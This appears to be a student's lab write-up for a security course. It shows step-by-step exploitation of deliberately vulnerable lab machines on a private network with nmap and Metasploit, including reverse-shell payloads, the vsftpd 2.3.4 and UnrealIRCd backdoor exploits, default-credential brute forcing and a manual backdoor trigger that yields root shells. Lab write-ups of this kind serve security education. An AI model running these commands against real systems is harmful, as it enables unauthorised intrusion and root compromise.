STL 1 Assignment 3

# STL 1 Assignment 3 # 2 ![](https://hackmd.io/_uploads/S1te0Bj83.png) nmap -sP 10.0.2.0/24 -T5 ![](https://hackmd.io/_uploads/HyxoSAHj8h.png) nmap -Pn 10.0.2.23 # 3 ![](https://hackmd.io/_uploads/S1L9JUsU2.png) auxiliary/scanner/mssql/mssql_login ![](https://hackmd.io/_uploads/BkJrZ8sUh.png) ![](https://hackmd.io/_uploads/BJ1rM8sU3.png) After running the ls command: ![](https://hackmd.io/_uploads/HJGq78sLh.png) ![](https://hackmd.io/_uploads/rJFuVUsUn.png) ![](https://hackmd.io/_uploads/HyxJHIjUn.png) show payloads ![](https://hackmd.io/_uploads/ryX7rIjIh.png) search reverse_tcp ![](https://hackmd.io/_uploads/Sk_5U8j8n.png) payload/windows/shell/reverse_tcp (This is the one I used.). Since this is a reverse shell and not using the meterpeter, I would be able to run windows specific commands as seen in the following: ![](https://hackmd.io/_uploads/SJiED8sLn.png) `dir` Linux commands do not work as seen in the following: ![](https://hackmd.io/_uploads/SkCDDUsUn.png) # 5 ## 5.1 ![](https://hackmd.io/_uploads/rJAn9LsL3.png) ![](https://hackmd.io/_uploads/ryMasLjLh.png) The IP Address for the Ubuntu machine is 10.0.2.4 and the open ports are shown options available: ![](https://hackmd.io/_uploads/rJGU-DoL3.png) Using `use auxiliary/scanner/postgres/postgres_login` to check for default passwords and credentials and exploit using `run postgres://10.0.2.4`, the following is found: ![](https://hackmd.io/_uploads/Sy4o0Ui82.png) `show options` to find the default password that metsploit already has (the name of the file is `postgres_default_pass.txt`): ![](https://hackmd.io/_uploads/r1iZwK1vh.png) The details of the default password list can be found in the following: ![](https://hackmd.io/_uploads/HkOPDYyPn.png) There are 4 rows in the file. To exploit using the information that we have, the following are run: `search postgres_payload` ![](https://hackmd.io/_uploads/S1ZA_Kyv2.png) We will be using the linux version and that can be done by running the following command: `use exploit/linux/postgres/postgres_payload` ![](https://hackmd.io/_uploads/Hk0fKKyw2.png) Running `exploit` will then allow us to enter the meterpeter (simulated shell of the machine): ![](https://hackmd.io/_uploads/HykOFtyD3.png) Running the `pwd; cat /etc/passwd; getuid; getpid` commands ![](https://hackmd.io/_uploads/ByisFFyw3.png) ## 5.2 ![](https://hackmd.io/_uploads/Bk_GcK1P3.png) In order to make sure that the exploit is available we can check whether the ftp port (21) is open, which in our case it is. To search for the vsftpd exploit: `search vsftpd` command is run ![](https://hackmd.io/_uploads/Sy1s9FJD2.png) `use exploit/unix/ftp/vsftpd_234_backdoor` is run ![](https://hackmd.io/_uploads/rJ9QsFkDn.png) we need to set the target IP to 10.0.2.4 and then exploit by running the following commands: `set RHOSTS 10.0.2.4` `exploit` The necessary commands `whoami`, `pwd`, `env` were run as well: ![](https://hackmd.io/_uploads/HktCiKyPh.png) ------------------- #### Manual Exploit Reference: - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - https://www.hackingtutorials.org/metasploit-tutorials/exploiting-vsftpd-metasploitable/ VSFTPD v2.3.4 contains a backdoor that was created by an intruder. To start the backdoor, the username must contain the “:)” character with any characters for the password: ![](https://hackmd.io/_uploads/Syt6AYyPh.png) Based on the reference I used `user:)` as the username and `pass` as the password. Before using the telnet to open a connection, port 6200 is closed as seen in the following: `nmap -sS -p 10.0.2.4 6200` ![](https://hackmd.io/_uploads/HJs9RY1D3.png) After using the telnet to open a connection in port 21, port 6200 is now open as seen: ![](https://hackmd.io/_uploads/SkzL1qJwn.png) Now that port 6200 is open, we can telnet inside and gain root access, as seen: ![](https://hackmd.io/_uploads/ryxleqyPh.png) In order to run the commands, we need to add `;` behind each command. ## 5.3 To run the IRC daemon exploit, we first need to make sure that port 6667 is open as seen: ![](https://hackmd.io/_uploads/rkw3e5Jwn.png) `search irc` ![](https://hackmd.io/_uploads/ryC-b5yDh.png) `use exploit/unix/irc/unreal_ircd_3281_backdoor` ![](https://hackmd.io/_uploads/SyLSZqJv3.png) `set RHOSTS 10.0.2.4` TO run the exploit we must first create the payload and to see what payloads are avaialble: `show payloads` ![](https://hackmd.io/_uploads/BJH1M9yv2.png) Since we want to have a reverse shell the payload we are using would be: `payload/cmd/unix/reverse` `set payload payload/cmd/unix/reverse` ![](https://hackmd.io/_uploads/SJ04z9kvn.png) Now that the payload is set, we need to make sure that the LHOST and RHOST, which was done earlier, are set properly: `set LHOST 10.0.2.15` ![](https://hackmd.io/_uploads/SygqMqkD3.png) run `exploit` to start exploitation: ![](https://hackmd.io/_uploads/r1uAf5kDn.png) As seen, I now have root access as seen from `whoami`. ## 5.4 a Chosen Exploit: vnc_login ![](https://hackmd.io/_uploads/HJmEewgP3.png) ![](https://hackmd.io/_uploads/BkFrmulDn.png) For the vnc_login, port 5900 should be open. The following are the commands to start setup for hte exploit: `search vnc_login` `use auxiliary/scanner/vnc/vnc_login ` `show options` ![](https://hackmd.io/_uploads/HkKbFwgw2.png) `set RHOSTS 10.0.2.4` `exploit` ![](https://hackmd.io/_uploads/BkXzoDgP2.png) Now that the exploit is successful and the password : `password` is found we can test whether it is working or not. vncviewer is already installed by default in kali and as such is the following command is run: `vncviewer 10.0.2.4` ![](https://hackmd.io/_uploads/rk7v6vgvh.png) ![](https://hackmd.io/_uploads/ryfhTDlvh.png) We can see that we have root access to this machine through vnc. ## 5.4 b Chosen Exploit: Apache/php 5.2.4 -- Port 80: https://medium.com/hacker-toolbelt/metasploitable-2-iv-port-80-5b90a0a22cb6 ![](https://hackmd.io/_uploads/H1IyaueDh.png) Based on `10.0.2.4/phpinfo.php` To make sure that the vulnerability is doable, port 80 must be open and the following screenshot shows that the port is open: ![](https://hackmd.io/_uploads/rJA_gDeD2.png) ![](https://hackmd.io/_uploads/B1cAfulDn.png) To find the php version, the following command is run: `search http_version` `use auxiliary/scanner/http/http_version` ![](https://hackmd.io/_uploads/SJf14dxP3.png) To run the exploit the following commadns are run: `set RHOSTS 10.0.2.4` `exploit` ![](https://hackmd.io/_uploads/rk6L4uevh.png) More information about the server: `use auxiliary/scanner/http/dir_scanner` ![](https://hackmd.io/_uploads/SkS6Tdlvh.png) `use auxiliary/scanner/http/verb_auth_bypass` ![](https://hackmd.io/_uploads/Skms6ugw3.png) We will be searching in `searchsploit` for the exploit using the following command: `searchsploit apache | grep 5.4.2` ![](https://hackmd.io/_uploads/SJvN0dxv3.png) Once found, we find the corresponding exploit in `metsploit` and `set RHOSTS 10.0.2.4`: ![](https://hackmd.io/_uploads/r1wp0OxP2.png) ![](https://hackmd.io/_uploads/H1_eyKgP2.png) The following is the screenshot after `exploit` is run to confirm that we have infiltrated the victim machine: ![](https://hackmd.io/_uploads/BJduftgv3.png) Results from command `pwd`, `env`, `whoami”, `ls` can be seen in screenshot above.